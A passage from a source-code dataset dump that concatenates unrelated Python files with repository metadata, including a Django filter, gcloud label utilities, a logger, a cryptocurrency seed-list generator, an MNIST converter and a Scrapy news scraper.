sum_time.h = t1.h + t2.h
sum_time.m = t1.m + t2.m
sum_time.s = t1.s + t2.s
if sum_time.s > 60:
val = sum_time.s / 60
sum_time.s -= (60 * val)
sum_time.m += val
if sum_time.m > 60:
val_1 = sum_time.m / 60
sum_time.m -= (60 * val_1)
sum_time.h += val_1
print '%.2d:%.2d:%.2d' % (sum_time.h,sum_time.m,sum_time.s)
print "t1 ",
print '%.2d:%.2d:%.2d' % (t1.h, t1.m, t1.s)
print "t2 ",
print '%.2d:%.2d:%.2d' % (t2.h, t2.m, t2.s)
add_time(t1,t2)
| [
"[email protected]"
] | |
5e875e702c4451a5fc79d1144425698fbc263c61 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_twining.py | 87ddda74e438d11af092105cfd9569d7a62ef7c6 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py |
from xai.brain.wordbase.adjectives._twin import _TWIN
#calss header
class _TWINING(_TWIN, ):
def __init__(self,):
_TWIN.__init__(self)
self.name = "TWINING"
self.specie = 'adjectives'
self.basic = "twin"
self.jsondata = {}
| [
"[email protected]"
] | |
e354add3beb18f533d7157be7068cbf4b7dd45db | 0b5b699459252996f058c8303a1f7093e7951ba0 | /food_delivery_app/restaurants/filters.py | 1c91e8a329ec67287390dbb43fe190d8aa8fe536 | [
"MIT"
] | permissive | MahmoudFarid/Food-Delivery-App | f145293548949618ae47d81f4ee7c35629fdaf5c | 8411ca48497e7347fe0258b720c2d2a566bb6e88 | refs/heads/master | 2020-04-12T04:40:22.129486 | 2018-12-23T21:52:09 | 2018-12-23T21:52:09 | 162,302,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | from django_filters import rest_framework as filters
from .models import Order
class OrderFilter(filters.FilterSet):
class Meta:
model = Order
fields = ['customer', 'status']
| [
"[email protected]"
] | |
0964ca87b1476b689cf1f886a4e21864d6b7bb07 | d488f052805a87b5c4b124ca93494bc9b78620f7 | /google-cloud-sdk/.install/.backup/lib/googlecloudsdk/command_lib/functions/deploy/labels_util.py | 5e9da496f8ef33a5e94a3f93ad396421b5bf7ef7 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | PacktPublishing/DevOps-Fundamentals | 5ce1fc938db66b420691aa8106ecfb3f9ceb1ace | 60597e831e08325c7e51e8557591917f7c417275 | refs/heads/master | 2023-02-02T04:48:15.346907 | 2023-01-30T08:33:35 | 2023-01-30T08:33:35 | 131,293,311 | 13 | 19 | null | null | null | null | UTF-8 | Python | false | false | 2,718 | py | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""'functions deploy' utilities for labels."""
from googlecloudsdk.api_lib.functions import util as api_util
from googlecloudsdk.calliope import exceptions as calliope_exceptions
from googlecloudsdk.command_lib.util.args import labels_util as args_labels_util
NO_LABELS_STARTING_WITH_DEPLOY_MESSAGE = (
'Label keys starting with `deployment` are reserved for use by deployment '
'tools and cannot be specified manually.')
def CheckNoDeploymentLabels(flag_name, label_names):
"""Check for labels that start with `deployment`, which is not allowed.
Args:
flag_name: The name of the flag to include in case of an exception
label_names: A list of label names to check
Raises:
calliope_exceptions.InvalidArgumentException
"""
if not label_names:
return
for label_name in label_names:
if label_name.startswith('deployment'):
raise calliope_exceptions.InvalidArgumentException(
flag_name, NO_LABELS_STARTING_WITH_DEPLOY_MESSAGE)
def SetFunctionLabels(function, update_labels, remove_labels, clear_labels):
"""Set the labels on a function based on args.
Args:
function: the function to set the labels on
update_labels: a dict of <label-name>-<label-value> pairs for the labels to
be updated, from --update-labels
remove_labels: a list of the labels to be removed, from --remove-labels
clear_labels: a bool representing whether or not to clear all labels,
from --clear-labels
Returns:
A bool indicating whether or not any labels were updated on the function.
"""
labels_to_update = update_labels or {}
labels_to_update['deployment-tool'] = 'cli-gcloud'
labels_diff = args_labels_util.Diff(additions=labels_to_update,
subtractions=remove_labels,
clear=clear_labels)
messages = api_util.GetApiMessagesModule()
labels_update = labels_diff.Apply(messages.CloudFunction.LabelsValue,
function.labels)
if labels_update.needs_update:
function.labels = labels_update.labels
return True
return False
| [
"[email protected]"
] | |
4374e0f6d09d3fac569ee903abba1a0b69fc1c4a | da7740e0d20dc7dd9775d4a53da7c0f7779834e1 | /MultiPlanarUNet/logging/logger.py | 4147e6a51aeb3f3ead32053006a4c39614f4c56e | [
"MIT"
] | permissive | xiaochengcike/MultiPlanarUNet | ca8fa35a8372b8d107bb16b29018e2413c108075 | 99c73ba2936b63282338cf31fe27086d414d2e62 | refs/heads/master | 2020-04-18T19:25:51.699311 | 2019-01-10T09:39:59 | 2019-01-10T09:39:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,492 | py | import os
import inspect
from MultiPlanarUNet.utils.decorators import accepts
class Logger(object):
def __init__(self, base_path, print_to_screen=True, active_file=None,
overwrite_existing=False, print_calling_method=True):
self.base_path = os.path.abspath(base_path)
self.path = os.path.join(self.base_path, "logs")
self.overwrite_existing = overwrite_existing
# Get built in print function
# (if overwritten globally, Logger still maintains a reference to the
# true print function)
self.print_f = __builtins__["print"]
if not os.path.exists(self.path):
os.mkdir(self.path)
# Print options
self.separator = "-" * 80
self.print_to_screen = print_to_screen
self.print_calling_method = print_calling_method
# Set paths to log files
self.log_files = {}
self.currently_logging = {}
self.active_log_file = active_file or "log"
def __repr__(self):
return "<MultiPlanarUNet.logging.Logger object>"
def __str__(self):
return "Logger(base_path=%s, print_to_screen=%s, " \
"overwrite_existing=%s)" % (self.base_path,
self.print_to_screen,
self.overwrite_existing)
def new_log_file(self, filename):
file_path = os.path.join(self.path, "%s.txt" % filename)
if os.path.exists(file_path):
if self.overwrite_existing:
os.remove(file_path)
else:
raise OSError("Logging path: %s already exists. "
"Initialize Logger(overwrite_existing=True) "
"to overwrite." % file_path)
self.log_files[filename] = file_path
self.currently_logging[filename] = None
self.active_log_file = filename
# Add reference to model folder in log
ref = "Log for model in: %s" % self.base_path
self._add_to_log(ref, no_print=True)
@property
def print_to_screen(self):
return self._print_to_screen
@print_to_screen.setter
@accepts(bool)
def print_to_screen(self, value):
self._print_to_screen = value
@property
def print_calling_method(self):
return self._print_calling_method
@print_calling_method.setter
@accepts(bool)
def print_calling_method(self, value):
self._print_calling_method = value
@property
def log(self):
with open(self.log_files[self.active_log_file], "r") as log_f:
return log_f.read()
@property
def active_log_file(self):
return self._active_log_file
@active_log_file.setter
@accepts(str)
def active_log_file(self, file_name):
if file_name not in self.log_files:
self.new_log_file(file_name)
self._active_log_file = file_name
def _add_to_log(self, *args, no_print=False, **kwargs):
if self.print_to_screen and not no_print:
self.print_f(*args, **kwargs)
with open(self.log_files[self.active_log_file], "a") as log_file:
self.print_f(*args, file=log_file, **kwargs)
def _log(self, caller, print_calling_owerwrite=None, *args, **kwargs):
if caller != self.currently_logging[self.active_log_file]:
self.currently_logging[self.active_log_file] = caller
if print_calling_owerwrite is not None:
print_calling = print_calling_owerwrite
else:
print_calling = self.print_calling_method
if print_calling:
self._add_to_log("%s\n>>> Logged by: %s" % (self.separator,
self.currently_logging[self.active_log_file]))
self._add_to_log(*args, **kwargs)
def __call__(self, *args, print_calling_method=None, **kwargs):
caller = inspect.stack()[1]
caller = "'%s' in '%s'" % (caller[3], caller[1].rpartition("/")[2])
self._log(caller, print_calling_method, *args, **kwargs)
def __enter__(self):
"""
Context manager
Sets logger as global print function within context
"""
__builtins__["print"] = self
return self
def __exit__(self, *args):
"""
Revert to default print function in global scope
"""
__builtins__["print"] = self.print_f
return self
| [
"[email protected]"
] | |
0637d34c345649b17b190752d77694ce2c4b4bb1 | 57c697ffebe2e9b3f5bd5da8122638152e4d0e9f | /contrib/seeds/makeseeds.py | 4b8d889c83c3bb295de84aab0658b5cb0d5ef45c | [
"MIT"
] | permissive | Globycoin/glbcore | 4039ddb98dec19dadebf8b2d583f27e6c083d9cd | d5dd9b5475915956849658373d8658286a08781b | refs/heads/master | 2020-03-22T20:02:44.733133 | 2018-11-15T00:42:39 | 2018-11-15T00:42:39 | 140,569,343 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,519 | py | #!/usr/bin/env python3
# Copyright (c) 2013-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Generate seeds.txt from Pieter's DNS seeder
#
NSEEDS=512
MAX_SEEDS_PER_ASN=2
MIN_BLOCKS = 615801
# These are hosts that have been observed to be behaving strangely (e.g.
# aggressively connecting to every node).
SUSPICIOUS_HOSTS = {
""
}
import re
import sys
import dns.resolver
import collections
PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):(\d+)$")
PATTERN_IPV6 = re.compile(r"^\[([0-9a-z:]+)\]:(\d+)$")
PATTERN_ONION = re.compile(r"^([abcdefghijklmnopqrstuvwxyz234567]{16}\.onion):(\d+)$")
PATTERN_AGENT = re.compile(r"^(/GlobycoinCore:2.2.(0|1|99)/)$")
def parseline(line):
sline = line.split()
if len(sline) < 11:
return None
m = PATTERN_IPV4.match(sline[0])
sortkey = None
ip = None
if m is None:
m = PATTERN_IPV6.match(sline[0])
if m is None:
m = PATTERN_ONION.match(sline[0])
if m is None:
return None
else:
net = 'onion'
ipstr = sortkey = m.group(1)
port = int(m.group(2))
else:
net = 'ipv6'
if m.group(1) in ['::']: # Not interested in localhost
return None
ipstr = m.group(1)
sortkey = ipstr # XXX parse IPv6 into number, could use name_to_ipv6 from generate-seeds
port = int(m.group(2))
else:
# Do IPv4 sanity check
ip = 0
for i in range(0,4):
if int(m.group(i+2)) < 0 or int(m.group(i+2)) > 255:
return None
ip = ip + (int(m.group(i+2)) << (8*(3-i)))
if ip == 0:
return None
net = 'ipv4'
sortkey = ip
ipstr = m.group(1)
port = int(m.group(6))
# Skip bad results.
if sline[1] == 0:
return None
# Extract uptime %.
uptime30 = float(sline[7][:-1])
# Extract Unix timestamp of last success.
lastsuccess = int(sline[2])
# Extract protocol version.
version = int(sline[10])
# Extract user agent.
if len(sline) > 11:
agent = sline[11][1:] + sline[12][:-1]
else:
agent = sline[11][1:-1]
# Extract service flags.
service = int(sline[9], 16)
# Extract blocks.
blocks = int(sline[8])
# Construct result.
return {
'net': net,
'ip': ipstr,
'port': port,
'ipnum': ip,
'uptime': uptime30,
'lastsuccess': lastsuccess,
'version': version,
'agent': agent,
'service': service,
'blocks': blocks,
'sortkey': sortkey,
}
def filtermultiport(ips):
'''Filter out hosts with more nodes per IP'''
hist = collections.defaultdict(list)
for ip in ips:
hist[ip['sortkey']].append(ip)
return [value[0] for (key,value) in list(hist.items()) if len(value)==1]
# Based on Greg Maxwell's seed_filter.py
def filterbyasn(ips, max_per_asn, max_total):
# Sift out ips by type
ips_ipv4 = [ip for ip in ips if ip['net'] == 'ipv4']
ips_ipv6 = [ip for ip in ips if ip['net'] == 'ipv6']
ips_onion = [ip for ip in ips if ip['net'] == 'onion']
# Filter IPv4 by ASN
result = []
asn_count = {}
for ip in ips_ipv4:
if len(result) == max_total:
break
try:
asn = int([x.to_text() for x in dns.resolver.query('.'.join(reversed(ip['ip'].split('.'))) + '.origin.asn.cymru.com', 'TXT').response.answer][0].split('\"')[1].split(' ')[0])
if asn not in asn_count:
asn_count[asn] = 0
if asn_count[asn] == max_per_asn:
continue
asn_count[asn] += 1
result.append(ip)
except:
sys.stderr.write('ERR: Could not resolve ASN for "' + ip['ip'] + '"\n')
# TODO: filter IPv6 by ASN
# Add back non-IPv4
result.extend(ips_ipv6)
result.extend(ips_onion)
return result
def main():
lines = sys.stdin.readlines()
ips = [parseline(line) for line in lines]
# Skip entries with valid address.
ips = [ip for ip in ips if ip is not None]
# Skip entries from suspicious hosts.
ips = [ip for ip in ips if ip['ip'] not in SUSPICIOUS_HOSTS]
# Enforce minimal number of blocks.
ips = [ip for ip in ips if ip['blocks'] >= MIN_BLOCKS]
# Require service bit 1.
ips = [ip for ip in ips if (ip['service'] & 1) == 1]
# Require at least 50% 30-day uptime.
ips = [ip for ip in ips if ip['uptime'] > 50]
# Require a known and recent user agent.
ips = [ip for ip in ips if PATTERN_AGENT.match(re.sub(' ', '-', ip['agent']))]
# Sort by availability (and use last success as tie breaker)
ips.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']), reverse=True)
# Filter out hosts with multiple bitcoin ports, these are likely abusive
ips = filtermultiport(ips)
# Look up ASNs and limit results, both per ASN and globally.
ips = filterbyasn(ips, MAX_SEEDS_PER_ASN, NSEEDS)
# Sort the results by IP address (for deterministic output).
ips.sort(key=lambda x: (x['net'], x['sortkey']))
for ip in ips:
if ip['net'] == 'ipv6':
print('[%s]:%i' % (ip['ip'], ip['port']))
else:
print('%s:%i' % (ip['ip'], ip['port']))
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
f886c22e0fbc3e0a268193239c53656c2954fcc7 | c54f5a7cf6de3ed02d2e02cf867470ea48bd9258 | /pyobjc/pyobjc-core/Lib/objc/_category.py | acfb9a48e26e38dd13712137c8517c88b442e532 | [
"MIT"
] | permissive | orestis/pyobjc | 01ad0e731fbbe0413c2f5ac2f3e91016749146c6 | c30bf50ba29cb562d530e71a9d6c3d8ad75aa230 | refs/heads/master | 2021-01-22T06:54:35.401551 | 2009-09-01T09:24:47 | 2009-09-01T09:24:47 | 16,895 | 8 | 5 | null | null | null | null | UTF-8 | Python | false | false | 2,372 | py | __all__ = ['classAddMethod', 'Category']
from _objc import selector, classAddMethods, objc_class, ivar
from types import FunctionType, MethodType
def classAddMethod(cls, name, method):
"""
Add a single method to a class. 'name' is the ObjC selector
"""
if isinstance(method, selector):
sel = selector(method.callable,
selector=name,
signature=method.signature,
isClassMethod=method.isClassMethod)
else:
sel = selector(method, selector=name)
return classAddMethods(cls, [sel])
#
# Syntactic support for categories
#
class _CategoryMeta(type):
"""
Meta class for categories.
"""
__slots__ = ()
_IGNORENAMES = ('__module__', '__name__', '__doc__')
def _newSubclass(cls, name, bases, methods):
return type.__new__(cls, name, bases, methods)
_newSubclass = classmethod(_newSubclass)
def __new__(cls, name, bases, methods):
if len(bases) != 1:
raise TypeError("Cannot have multiple inheritance with Categories")
c = bases[0].real_class
if c.__name__ != name:
raise TypeError("Category name must be same as class name")
m = [ x[1] for x in methods.iteritems() if x[0] not in cls._IGNORENAMES and isinstance(x[1], (FunctionType, MethodType, selector, classmethod))]
vars = [ x for x in methods.iteritems() if x[0] not in cls._IGNORENAMES and not isinstance(x[1], (FunctionType, MethodType, selector, classmethod))]
for k, v in vars:
if isinstance(v, ivar):
raise TypeError("Cannot add instance variables in a Category")
classAddMethods(c, m)
for k, v in vars:
setattr(c, k, v)
return c
def Category(cls):
"""
Create a category on ``cls``.
Usage:
class SomeClass (Category(SomeClass)):
def method(self):
pass
``SomeClass`` is an existing class that will be rebound to the same
value. The side-effect of this class definition is that the methods
in the class definition will be added to the existing class.
"""
if not isinstance(cls, objc_class):
raise TypeError, "Category can only be used on Objective-C classes"
retval = _CategoryMeta._newSubclass('Category', (), dict(real_class=cls))
return retval
| [
"ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25"
] | ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25 |
ab81aec92b4137221d359ec9b7ddacf88e47a00b | 81e008b746f89d144066ee5589fafa370f37e5a5 | /1005.py | 8bf880a472d0444a295f1fb678435685f4c44eb9 | [] | no_license | osmarsalesjr/SolucoesUriOnlineJudgeEmPython3 | 5c43fb37608ff3d8ff042d94e6b897f4b1d6afb9 | 5de3fa39483fd4ff409efa5981e65daba7744809 | refs/heads/master | 2021-01-01T06:40:51.938732 | 2017-08-30T21:46:39 | 2017-08-30T21:46:39 | 97,482,585 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py |
def main():
a = float(input())
b = float(input())
media = ((a * 3.5) + (b * 7.5)) / 11
print("MEDIA = %.5f" % media)
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
594f7ee6ba623887c47dbde85e653e5183136971 | f9886d2b57d92186773d73f59dc0a0e9759b8944 | /04_bigdata/02_Standardization_Analysis/2.Excel/10_excel_column_by_name_all_worksheets.py | c9fc988e32e973138146a52d7b0e7546d7aca05f | [] | no_license | Meengkko/bigdata_python2019 | 14bab0da490bd36c693f50b5d924e27f4a8e02ba | a28e964ab7cefe612041830c7b1c960f92c42ad5 | refs/heads/master | 2022-12-12T15:51:21.448923 | 2019-11-08T03:50:15 | 2019-11-08T03:50:15 | 195,142,241 | 0 | 0 | null | 2022-04-22T22:37:59 | 2019-07-04T00:17:18 | HTML | UTF-8 | Python | false | false | 1,894 | py | # 목적: 열의 인덱스 값을 사용하여 특정 열 선택하기
# 라이브러리 호출
import sys
from datetime import date
from xlrd import open_workbook, xldate_as_tuple
from xlwt import Workbook
# 시스템 인자로 인풋/아웃풋 설정
input_file = sys.argv[1] # sales_2013.xlsx
output_file = sys.argv[2] # output_files/10_output_basic.xls
# 워크북클래스, 시트 이름 설정
output_workbook = Workbook()
output_worksheet = output_workbook.add_sheet('selected_columns_all_worksheets')
my_columns = ['Customer Name', 'Sale Amount']
first_worksheet = True
# 파일 오픈 및 1월 데이터 가져오기
with open_workbook(input_file) as workbook:
data = [my_columns]
index_of_cols_to_keep = []
for worksheet in workbook.sheets():
if first_worksheet:
header = worksheet.row_values(0)
for column_index in range(len(header)):
if header[column_index] in my_columns:
index_of_cols_to_keep.append(column_index)
first_worksheet = False
for row_index in range(1, worksheet.nrows):
row_list = []
for column_index in index_of_cols_to_keep:
cell_value = worksheet.cell_value(row_index, column_index)
cell_type = worksheet.cell_type(row_index, column_index)
if cell_type == 3:
date_cell = xldate_as_tuple(cell_value, workbook.datemode)
date_cell = date(*date_cell[0:3]).strftime('%m/%d/%Y')
row_list.append(date_cell)
else:
row_list.append(cell_value)
data.append(row_list)
for list_index, output_list in enumerate(data):
for element_index, element in enumerate(output_list):
output_worksheet.write(list_index, element_index, element)
output_workbook.save(output_file)
| [
"[email protected]"
] | |
e831918416256c25927fb1be5c435b8555f05dc6 | 577a40ff1c84d28b88a9ade84d265587d28ed2a3 | /0707/02.py | 1c05cbec1dfbd4eeaecf48ec375bcfb73a53d48c | [] | no_license | bosl95/MachineLearning_Note | b167c182fcf5186f6466b8b062cde83b076b0b04 | 934714c5a62e4864f2b5338153c3aaeb3363abe9 | refs/heads/master | 2022-12-06T20:58:20.457567 | 2020-09-05T16:18:11 | 2020-09-05T16:18:11 | 279,835,223 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,580 | py | import struct
name = 'train'
maxdata = 1000
path = 'mnist/'
lbl_f = open(path + name + '-labels-idx1-ubyte', 'rb') # 학습정답파일. 바이너리.
img_f = open(path + name + '-images-idx3-ubyte', 'rb')
csv_f = open(path + name + '.csv', 'w', encoding='utf-8')
mag, lbl_count = struct.unpack('>II', lbl_f.read(8)) # 레이블파일에서 매직넘버와 개수를 읽음
print(lbl_count)
mag, img_count = struct.unpack('>II', img_f.read(8)) # 숫자 이미지파일에서 매직넘버와 개수를 읽음
print(mag)
print(img_count)
row, col = struct.unpack('>II', img_f.read(8)) # 숫자 이미지파일에서 이미지 가로, 세로 길이 읽음
print(row)
print(col)
px = row * col # 숫자이미지 한개의 바이트 수(크기)
res = []
for idx in range(lbl_count):
if idx > maxdata: # 1000이 넘으면 break
break
label = struct.unpack("B", lbl_f.read(1))[0] # 정답 파일(레이블)에서 숫자 한개씩 읽음
bdata = img_f.read(px) # 숫자 이미지 파일에서 이미지 한 개 크기만큼 읽어서 bdata에 담음.
sdata = list(map(lambda n: str(n), bdata))
# print(sdata)
csv_f.write(str(label) + ',')
csv_f.write(','.join(sdata) + '\r\n')
if idx < 10: # 이 if 블럭은 써도 되고, 안써도 됨. 이미지를 단위별로 잘 불러오나 확인용
s = 'P2 28 28 255\n'
s += ' '.join(sdata)
iname = path + '{0}-{1}-{2}.pgm'.format(name, idx, label)
with open(iname, 'w', encoding='utf-8') as f:
f.write(s)
csv_f.close()
lbl_f.close()
img_f.close() | [
"[email protected]"
] | |
369183498068e8e4659aa370fd0efa60b8a6ebd1 | 72316a1d1a2e0358486d50aeecbac8219ccdf092 | /ietf/bin/send-milestone-reminders | 9ed5d254f74bbac1e2488cb1549dcb81cb5f4510 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | algby/ietfdb | 363541941bd6e806bed70891bed4c7f47c9f0539 | 9ff37e43abbecac873c0362b088a6d9c16f6eed2 | refs/heads/master | 2021-01-16T18:57:50.100055 | 2014-09-29T21:16:55 | 2014-09-29T21:16:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,566 | #!/usr/bin/env python
#
# This script will send various milestone reminders. It's supposed to
# be run daily, and will then send reminders weekly/monthly as
# appropriate.
import datetime, os
import syslog
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ietf.settings")
syslog.openlog(os.path.basename(__file__), syslog.LOG_PID, syslog.LOG_LOCAL0)
from ietf.group.mails import *
today = datetime.date.today()
MONDAY = 1
FIRST_DAY_OF_MONTH = 1
if today.isoweekday() == MONDAY:
# send milestone review reminders - ideally we'd keep track of
# exactly when we sent one last time for a group, but it's a bit
# complicated because people can change the milestones in the mean
# time, so dodge all of this by simply sending once a week only
for g in groups_with_milestones_needing_review():
mail_sent = email_milestone_review_reminder(g, grace_period=7)
if mail_sent:
syslog.syslog("Sent milestone review reminder for %s %s" % (g.acronym, g.type.name))
early_warning_days = 30
# send any milestones due reminders
for g in groups_needing_milestones_due_reminder(early_warning_days):
email_milestones_due(g, early_warning_days)
syslog.syslog("Sent milestones due reminder for %s %s" % (g.acronym, g.type.name))
if today.day == FIRST_DAY_OF_MONTH:
# send milestone overdue reminders - once a month
for g in groups_needing_milestones_overdue_reminder(grace_period=30):
email_milestones_overdue(g)
syslog.syslog("Sent milestones overdue reminder for %s %s" % (g.acronym, g.type.name))
| [
"[email protected]@7b24d068-2d4e-4fce-9bd7-cbd2762980b0"
] | [email protected]@7b24d068-2d4e-4fce-9bd7-cbd2762980b0 |
|
8d4e01d63f029ae4f6264c3ec8a2b1b51bacfbc6 | 0fa51edef92cd07033e7d03aa441ae54d8edad2e | /news_scrapers/epu_scrapy/spiders/deredactie_spider.py | f7aab7c2ba79b7d300fec7f911dcf631998cb515 | [] | no_license | Datafable/epu-index | d86fc108f7e8591cb949fde78f490fd970654bde | 3f9d24448ff85a8ea6736dbf9da0ec954a3b224b | refs/heads/master | 2020-12-25T18:13:53.397154 | 2018-03-28T09:37:53 | 2018-03-28T09:37:53 | 35,040,805 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,835 | py | import scrapy
from scrapy.contrib.spiders import CrawlSpider
from scrapy.exceptions import CloseSpider
from epu_scrapy.items import Article
from datetime import datetime, timedelta
from time import strptime, strftime, mktime
import re
import json
import os
def set_start_urls(settings):
"""
Based on the dates given in the settings file, construct the start urls for the spider
"""
term = settings['term']
if type(settings['period']) is not dict:
today = datetime.today()
if settings['period'] != 'yesterday':
CloseSpider("unknown period setting. See the scrapers README for more information.")
search_day = today - timedelta(days=1) # search for articles of yesterday
search_day_str = '{0}/{1}/{2}'.format(search_day.day, search_day.month, search_day.year % 100)
start_urls = ['http://deredactie.be/cm/vrtnieuws/1.516538?text={0}&type=text&range=atdate&isdate={1}&sort=date&action=submit&advancedsearch=on'.format(term, search_day_str)]
else:
start = datetime(*strptime(settings['period']['start'], '%Y-%m-%d')[:6]) # awkward syntax to convert struct time to datetime (see: http://stackoverflow.com/questions/1697815/how-do-you-convert-a-python-time-struct-time-object-into-a-datetime-object)
start_str = '{0}/{1}/{2}'.format(start.day, start.month, start.year % 100)
end = datetime(*strptime(settings['period']['end'], '%Y-%m-%d')[:6])
end_str = '{0}/{1}/{2}'.format(end.day, end.month, end.year % 100)
start_urls = ['http://deredactie.be/cm/vrtnieuws/1.516538?text={0}&type=text&range=betweendate&startdate={1}&enddate={2}&sort=date&action=submit&advancedsearch=on'.format(term, start_str, end_str)]
return start_urls
class DeredactieSpider(CrawlSpider):
name = 'deredactie' # name of the spider, to be used when running from command line
allowed_domains = ['deredactie.be']
settings = json.load(open(os.path.join(os.path.dirname(os.path.dirname(__file__)), 'crawling_settings.json')))
start_urls = set_start_urls(settings)
def parse(self, response):
"""
Parse the first search page to determine the number of articles returned. Use the urls offset parameter
to iterate over all response pages and yield scrapy.Request objects that will be parsed with the
parse_list_page function
"""
nr_of_articles_element = response.xpath('//li[contains(concat(" ", normalize-space(@class), " "), " searchcounter ")]')
if len(nr_of_articles_element) is 2:
# nr of articles is mentioned above list of articles and below. So the number of elements that match the xpath selector is 2
nr_of_articles_text = ''.join(nr_of_articles_element[0].xpath('descendant-or-self::*/text()').extract())
# Explaining the regular expression at line 53:
# (?P<offset>\d+) => matches a number (\d+) and assigns it to group "offset"
# (?P<pagesize>\d+) => matches a number (\d+) and assigns it to group "pagesize"
# \s+van\s+ => matches the word "van" surrounded by whitespace (spaces, tabs etc)
# (?P<nr_of_articles>\d+) => matches a number (\d+) and assigns it to group "nr_of_articles"
m = re.search('(?P<offset>\d+)-(?P<pagesize>\d+)\s+van\s+(?P<nr_of_articles>\d+)', nr_of_articles_text)
if m:
pagesize = int(m.group('pagesize')) - int(m.group('offset')) + 1
nr_of_articles = int(m.group('nr_of_articles'))
for i in range(0, nr_of_articles, pagesize):
# Note that the offset parameter starts at 0
yield scrapy.Request(self.start_urls[0] + '&offset={0}'.format(i), callback=self.parse_list_page)
else:
raise scrapy.exceptions.CloseSpider('Could not parse number of articles from {0}'.format(response.url))
else:
raise scrapy.exceptions.CloseSpider('Element containing the number of articles was not found at {0}'.format(response.url))
def parse_published_datetime(self, datetime_element_parts):
"""
Helper method to parse a datetime from a html element
"""
datetime_str_parts = [x.encode('utf-8') for x in datetime_element_parts]
datetime_str = ' '.join(datetime_str_parts).strip()
datetime_str_stripped = re.findall('[0-9]+/[0-9]+/[0-9]+[^0-9]+[0-9]+:[0-9]+', datetime_str)[0]
dt = datetime(*strptime(datetime_str_stripped, '%d/%m/%Y - %H:%M')[0:6])
return dt.isoformat()
def parse_list_page(self, response):
"""
Parse a single page returned by the search query. Find all links referring to articles and yield
scrapy.Request objects for every link found. The parsing of these links is done by the parse_article
function.
"""
print response.url
links = response.xpath('//div[contains(concat(" ", normalize-space(@class), " "), " searchresults ")]/descendant::a/@href').extract()
link_set = set([x.encode('utf-8') for x in links])
for l in link_set:
if l != '#':
# an article link can point to a single article page, or a storyline page, which includes several articles.
# in both cases, the id of the actual article that is pointed to can be found in the url. In the case
# of a storyline, the url is like /cm/vrtnieuws/buitenland/<storylineid>?eid=<articleid> while for a
# single article page, the url is /cm/vrtnieuws/binnenland/<articleid>. Both a storylineid and a articleid
# look something like 1.193019, which will be matched by the regular expression pattern [0-9.]+
article_id = re.findall('[0-9.]+', l)[-1] # the last string that matches this pattern in the url is the article id
l = 'http://deredactie.be/cm/' + article_id
yield scrapy.Request(l, callback=self.parse_article)
def parse_article(self, response):
"""
Parse the article content page
"""
# search for article title
title_parts = response.xpath('//div[@id="articlehead"]/h1/text()').extract()
if len(title_parts) > 0:
title = ' '.join(set(title_parts)).encode('utf-8').strip()
else:
title = ''
# search for article published date
datetime_element_parts = response.xpath('//small[@id="pubdate"]/strong/text()').extract()
if len(datetime_element_parts) > 0:
datetime_iso_str = self.parse_published_datetime(datetime_element_parts)
else:
datetime_iso_str = ''
# search for article intro text
article_intro_parts = response.xpath('//div[@id="intro"]/strong/text()').extract()
article_intro = ' '.join([x.strip() for x in article_intro_parts]).strip()
# search for article full text
article_full_text_fragments = response.xpath('//div[@id="articlebody"]/descendant::p/descendant-or-self::*/text()').extract()
article_full_text = ' '.join([x.strip() for x in article_full_text_fragments]).strip()
# reconstruct the url to the nicely rendered page
url_parts = response.url.split('/')
article_id = url_parts.pop()
url_parts.append('vrtnieuws')
url_parts.append(article_id)
url = '/'.join(url_parts)
# now create an Article item, and return it. All Articles created during scraping can be written to an output file when the -o option is given.
article = Article()
article['url'] = url
article['intro'] = article_intro
article['title'] = title
article['published_at'] = datetime_iso_str
article['text'] = article_full_text
return article
| [
"[email protected]"
] | |
ea386863fc4bcc4650983431b032e9c25ddd69a7 | 8ca2c5b9673c9bf9a7b6033ffc7b3aea7008ca91 | /src/gdata/finance/__init__.py | f207b212756b50e71075be803fb53ec064e8dcbe | [
"Apache-2.0"
] | permissive | hfalcic/google-gdata | c3a10f0260002c3d8a8d44686572ec2002e076e0 | 56d49a9915ce51590a655ec5f8aeef9f65517787 | refs/heads/master | 2021-01-10T22:01:52.403803 | 2015-02-17T15:12:18 | 2015-02-17T15:12:18 | 24,432,292 | 3 | 1 | null | 2014-11-30T07:26:44 | 2014-09-24T20:53:59 | Python | UTF-8 | Python | false | false | 15,423 | py | #!/usr/bin/env python
#
# Copyright (C) 2009 Tan Swee Heng
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
